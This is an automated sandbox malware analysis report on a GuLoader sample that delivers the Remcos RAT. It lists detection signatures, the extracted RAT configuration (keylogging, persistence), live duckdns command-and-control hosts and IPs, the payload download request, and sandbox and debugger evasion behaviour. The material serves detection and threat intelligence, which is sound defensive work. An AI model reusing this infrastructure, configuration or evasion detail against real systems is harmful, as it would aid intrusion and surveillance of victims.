Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DW1VgsgHNU.exe

Overview

General Information

Sample Name:DW1VgsgHNU.exe
Analysis ID:491400
MD5:b30b9c1d23026ff24f234a07a557dc83
SHA1:044ceea8b2fb554e2fdd7bcf4d695dded3a58d3b
SHA256:c54b1a3af48ef7f70434b9e90c33b4bcdccfbd20339d8164e34957890c67f888
Tags:exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses dynamic DNS services
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • DW1VgsgHNU.exe (PID: 6420 cmdline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe' MD5: B30B9C1D23026FF24F234A07A557DC83)
    • DW1VgsgHNU.exe (PID: 2800 cmdline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe' MD5: B30B9C1D23026FF24F234A07A557DC83)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: DW1VgsgHNU.exe PID: 2800JoeSecurity_RemcosYara detected Remcos RATJoe Security

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "dyn-wave.duckdns.org:1144:1dyn-wave.duckdns.org:2404:0", "Assigned name": "RemoteHost_NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-2LBKGP", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
        Source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://dypage.duckdns.org/remcos_d_QUBXVO174"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: DW1VgsgHNU.exeVirustotal: Detection: 20%Perma Link
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR
        Machine Learning detection for sampleShow sources
        Source: DW1VgsgHNU.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 1_2_00402520 CryptDestroyHash,1_2_00402520
        Source: DW1VgsgHNU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: dyn-wave.duckdns.org
        Source: Malware configuration extractorURLs: http://dypage.duckdns.org/remcos_d_QUBXVO174
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: dypage.duckdns.org
        Source: unknownDNS query: name: dyn-wave.duckdns.org
        Source: global trafficHTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dypage.duckdns.orgCache-Control: no-cache
        Source: global trafficTCP traffic: 192.168.2.7:49893 -> 23.146.241.70:1144
        Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
        Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
        Source: Joe Sandbox ViewIP Address: 23.146.242.85 23.146.242.85
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.bin
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binD
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpString found in binary or memory: http://dypage.duckdns.org/remcos_d_QUBXVO174.binE
        Source: unknownDNS traffic detected: queries for: dypage.duckdns.org
        Source: global trafficHTTP traffic detected: GET /remcos_d_QUBXVO174.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: dypage.duckdns.orgCache-Control: no-cache

        E-Banking Fraud:

        barindex
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        System Summary:

        barindex
        Potential malicious icon foundShow sources
        Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
        Source: DW1VgsgHNU.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: DW1VgsgHNU.exe, 00000001.00000000.242528368.000000000042D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exe, 00000019.00000000.498515700.000000000042D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exeBinary or memory string: OriginalFilenameSrklasse4.exe vs DW1VgsgHNU.exe
        Source: DW1VgsgHNU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056EED3 Sleep,NtProtectVirtualMemory,25_2_0056EED3
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056ED3B NtProtectVirtualMemory,25_2_0056ED3B
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056EDD4 NtProtectVirtualMemory,25_2_0056EDD4
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056ED50 NtProtectVirtualMemory,25_2_0056ED50
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056EF19 NtProtectVirtualMemory,25_2_0056EF19
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 25_2_0056ED2E NtProtectVirtualMemory,25_2_0056ED2E
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess Stats: CPU usage > 98%
        Source: DW1VgsgHNU.exeVirustotal: Detection: 20%
        Source: DW1VgsgHNU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe' Jump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-2LBKGP
        Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/0@2/2
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 1_2_00409ABA pushad ; iretd 1_2_00409ABB
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeCode function: 1_2_00407B13 push ecx; retf 1_2_00407B14
        Source: initial sampleStatic PE information: section name: .text entropy: 6.92804161947
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeSystem information queried: ModuleInformationJump to behavior
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,

        Anti Debugging:

        barindex
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\DW1VgsgHNU.exeProcess created: C:\Users\user\Desktop\DW1VgsgHNU.exe 'C:\Users\user\Desktop\DW1VgsgHNU.exe' Jump to behavior
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpBinary or memory string: Program Manager
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: Progman
        Source: DW1VgsgHNU.exe, 00000019.00000002.768074297.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
        Source: DW1VgsgHNU.exe, 00000019.00000002.767758753.00000000009A1000.00000004.00000020.sdmpBinary or memory string: |Program Manager|
        Source: DW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpBinary or memory string: Program ManagerY

        Stealing of Sensitive Information:

        barindex
        GuLoader behavior detectedShow sources
        Source: Initial fileSignature Results: GuLoader behavior
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Yara detected Remcos RATShow sources
        Source: Yara matchFile source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: DW1VgsgHNU.exe PID: 2800, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion2OS Credential DumpingSecurity Software Discovery21Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        DW1VgsgHNU.exe20%VirustotalBrowse
        DW1VgsgHNU.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://dypage.duckdns.org/remcos_d_QUBXVO174.bin0%Avira URL Cloudsafe
        dyn-wave.duckdns.org0%Avira URL Cloudsafe
        http://dypage.duckdns.org/remcos_d_QUBXVO174.binE0%Avira URL Cloudsafe
        http://dypage.duckdns.org/remcos_d_QUBXVO174.binD0%Avira URL Cloudsafe
        http://dypage.duckdns.org/remcos_d_QUBXVO1740%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        dypage.duckdns.org
        		23.146.242.85
        		truetrue
          		unknown
          dyn-wave.duckdns.org
          		23.146.241.70
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binfalse
            • Avira URL Cloud: safe
            		unknown
            dyn-wave.duckdns.orgtrue
            • Avira URL Cloud: safe
            		unknown
            http://dypage.duckdns.org/remcos_d_QUBXVO174true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binEDW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://dypage.duckdns.org/remcos_d_QUBXVO174.binDDW1VgsgHNU.exe, 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            23.146.241.70
            		dyn-wave.duckdns.orgReserved
            		46664VDI-NETWORKUStrue
            23.146.242.85
            		dypage.duckdns.orgReserved
            		46664VDI-NETWORKUStrue

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:491400
            Start date:27.09.2021
            Start time:14:52:48
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 40s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:DW1VgsgHNU.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:29
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.rans.troj.evad.winEXE@3/0@2/2
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 73.1% (good quality ratio 35.6%)
            • Quality average: 25.5%
            • Quality standard deviation: 32.4%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            • Override analysis time to 240s for sample files taking high CPU consumption
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.54.113.53, 95.100.54.203, 20.82.209.183, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.210.154
            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            23.146.241.707HHrcwZjLI.exeGet hashmaliciousBrowse
              23.146.242.857HHrcwZjLI.exeGet hashmaliciousBrowse
              • dypage.duckdns.org/remcos_d_QUBXVO174.bin
              466XoziOLD.exeGet hashmaliciousBrowse
              • sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
              hVlpEajflR.exeGet hashmaliciousBrowse
              • spage.duckdns.org/Remcos_S_tGNeLX139.bin
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • dpage.duckdns.org/remcos_d_fIqfwC80.bin
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              dypage.duckdns.org7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.242.85
              dyn-wave.duckdns.org7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.241.70

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              VDI-NETWORKUS7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.242.85
              466XoziOLD.exeGet hashmaliciousBrowse
              • 23.146.242.85
              hVlpEajflR.exeGet hashmaliciousBrowse
              • 23.146.242.85
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • 23.146.242.85
              HxXHmM0T9f.exeGet hashmaliciousBrowse
              • 23.146.242.147
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • 23.146.242.85
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.85
              eXik5mFvet.exeGet hashmaliciousBrowse
              • 23.146.242.94
              CVEXzxk43s.exeGet hashmaliciousBrowse
              • 23.146.242.94
              yOCBr7SNLJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              13FlI4deWN.exeGet hashmaliciousBrowse
              • 23.146.242.94
              Payment Notification.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Request For Quotation.jarGet hashmaliciousBrowse
              • 23.146.242.147
              OvBS76pTyX.exeGet hashmaliciousBrowse
              • 23.146.242.94
              U6lqJJBG8S.exeGet hashmaliciousBrowse
              • 23.146.242.94
              pNyAinWdWJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              YTVrQC7FhG.exeGet hashmaliciousBrowse
              • 23.146.242.94
              I4eRfFgJG7.exeGet hashmaliciousBrowse
              • 23.146.242.94
              VDI-NETWORKUS7HHrcwZjLI.exeGet hashmaliciousBrowse
              • 23.146.242.85
              466XoziOLD.exeGet hashmaliciousBrowse
              • 23.146.242.85
              hVlpEajflR.exeGet hashmaliciousBrowse
              • 23.146.242.85
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • 23.146.242.85
              HxXHmM0T9f.exeGet hashmaliciousBrowse
              • 23.146.242.147
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • 23.146.242.85
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.85
              eXik5mFvet.exeGet hashmaliciousBrowse
              • 23.146.242.94
              CVEXzxk43s.exeGet hashmaliciousBrowse
              • 23.146.242.94
              yOCBr7SNLJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              13FlI4deWN.exeGet hashmaliciousBrowse
              • 23.146.242.94
              Payment Notification.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Request For Quotation.jarGet hashmaliciousBrowse
              • 23.146.242.147
              OvBS76pTyX.exeGet hashmaliciousBrowse
              • 23.146.242.94
              U6lqJJBG8S.exeGet hashmaliciousBrowse
              • 23.146.242.94
              pNyAinWdWJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              YTVrQC7FhG.exeGet hashmaliciousBrowse
              • 23.146.242.94
              I4eRfFgJG7.exeGet hashmaliciousBrowse
              • 23.146.242.94

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.693618961961531
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:DW1VgsgHNU.exe
              File size:184320
              MD5:b30b9c1d23026ff24f234a07a557dc83
              SHA1:044ceea8b2fb554e2fdd7bcf4d695dded3a58d3b
              SHA256:c54b1a3af48ef7f70434b9e90c33b4bcdccfbd20339d8164e34957890c67f888
              SHA512:80f9e5c0df30a6937450a35531b5be188c98a911703c30064575b1f6707ebeed98643f0166e689fa54ee5e17c232b9825fcdc6d13cb62ad89f22ef6883124bc3
              SSDEEP:3072:aTN6q3h21LWcznBUcxYIBpafjJJUB/yu0d/eWjUUqdj/WHA:aTyttVBwbbGyjeWjp
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....xH.....................0......`.............@................

              File Icon

              Icon Hash:20047c7c70f0e004

              Static PE Info

              General

              Entrypoint:0x401460
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x487895E2 [Sat Jul 12 11:30:42 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:831c9926df4754b736e1ca092f4fb7e7

              Entrypoint Preview

              Instruction
              push 004016B8h
              call 00007FE2A8EDA4F3h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              dec eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], dl
              test byte ptr [edx-47h], cl
              or eax, dword ptr [edx+eax*2-2B734EBAh]
              cld
              xchg eax, esp
              fsubr dword ptr [esi+0000003Dh]
              add byte ptr [eax], al
              add byte ptr [ecx], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax+71h], bl
              push cs
              add eax, dword ptr [ecx+52h]
              inc ebp
              inc ecx
              dec esp
              inc edx
              inc ebp
              push edx
              inc ebp
              inc edi
              dec esi
              dec ecx
              dec esi
              inc edi
              inc ebp
              dec esi
              add byte ptr [edi], al
              inc ecx
              add byte ptr [ecx+esi*2+0000030Eh], cl
              add byte ptr [eax], al
              dec esp
              xor dword ptr [eax], eax
